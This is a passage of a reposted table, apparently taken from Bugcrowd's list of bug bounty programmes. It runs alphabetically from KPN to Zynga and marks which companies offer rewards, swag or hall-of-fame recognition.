active] [TD] KPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Kraken [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Laer [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] LastPass [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] LaunchKey [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Librato [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Lievensberg Hospital [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Liferay [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] LinkedIn [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Localize [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Logentries [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Lookout [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] MacOS X Bitcoin LevelDB data corruption issue [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Magento [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Magix AG [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Mahara [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ManageWP [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Mandrill App [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Marktplaats [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] MCProHosting [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Mega.co.nz [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Meldium [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Meraki [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Microsoft (bounty programs) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Microsoft (Online Services) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Microweber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Millsap Independent School District [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Modus CSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Moneybird [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Moodle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Motorola [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Movember [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Movielee [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward swag] [TD] Mozilla [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Myntra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] MyStuff2 App [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Namazu [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] National Cyber ??Security Center (Netherlands) [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Netagio [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Netflix [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Net Worth Pro [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nitrous.IO [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Nokia Siemens Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Norada [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] NSN Nokia Solutions Networks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Nvidia [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Oculus [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Offers.com [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward swag] [TD] Olark [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Onavo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] OnePageCRM [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] OpenBSD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Openclass Knowledge Base [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] OpenText [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Opera [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Oracle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Orkut [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] PagerDuty [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pantheon [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Panzura [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Parse [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paychoice [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Paymill [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Paypal [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Pidgin [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] PikaPay [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pinoy Hack News [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Pinterest [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Piwik [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Pocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Polar SSL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] PostmarkApp [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Prezi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] PullReview [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Puppet Labs [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] PureVPN [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Qiwi [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Qmail [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Qualcomm [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Rackspace [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Reddit [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] RedHat [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Regiobank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Relaso [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Ribose [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] Ripple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Riskalyze [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Risk.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Salesforce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Samba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Samsung [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] SBWire [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame swag] [TD] Schuberg Philis [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Scorpion Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Security Net [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Segment.io [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sellfy [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] ServiceRocket [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Shopify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Silent Circle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Simple [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Simplify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] SiteGround [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Skuid [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Smart Budget [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] SmileznHapiez [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] SNS Bank NL [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Sonatype [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sony [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Soundcloud [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] SplashID [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Splitwise [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Spotify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Sprout Social [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Square [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward swag] [TD] StatusPage.io [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Sunrise [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Symantec [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tagged [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tapatalk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tarsnap [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Team Unify [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Tele2 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Telegram [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tesla [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] The Humble Bundle [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Trade Only [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] Tresorit [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Tuenti [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Tumblr [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twilio [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Twitch [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Twitter [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Typo3 [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Uber [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Unitag [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] UPC [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Valve Software [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VCE [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Venmo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Viadeo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Vodafone (Netherlands) [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Volcanic Pixels [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Volusion [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] VSR [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Wamba [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Webconverger [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward swag] [TD] Websecurify [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active reward] [TD] WHMCS [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Windthorst ISD [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] X.commerce [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Xen [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Xmarks [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active reward] [TD] XMind [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame reward] [TD] Yahoo [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] Yandex [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Yesware [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame reward] [TD] YouTube [/TD] [TD=class: new] [/TD] [TD] Yes [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame] [TD] Zencash [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active fame swag] [TD] Zendesk [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD] Yes [/TD] [TD=class: hall-of-fame] Yes [/TD] [/TR] [TR=class: active] [TD] Zetetic [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Ziggo [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active] [TD] Zimbra [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] [/TD] [/TR] [TR=class: active fame] [TD] Zynga [/TD] [TD=class: new] [/TD] [TD=class: reward] [/TD] [TD=class: swag] [/TD] [TD=class: hall-of-fame] Yes[/TD] [/TR] [/TABLE] Sursa: https://bugcrowd.com/list-of-bug-bounty-programs

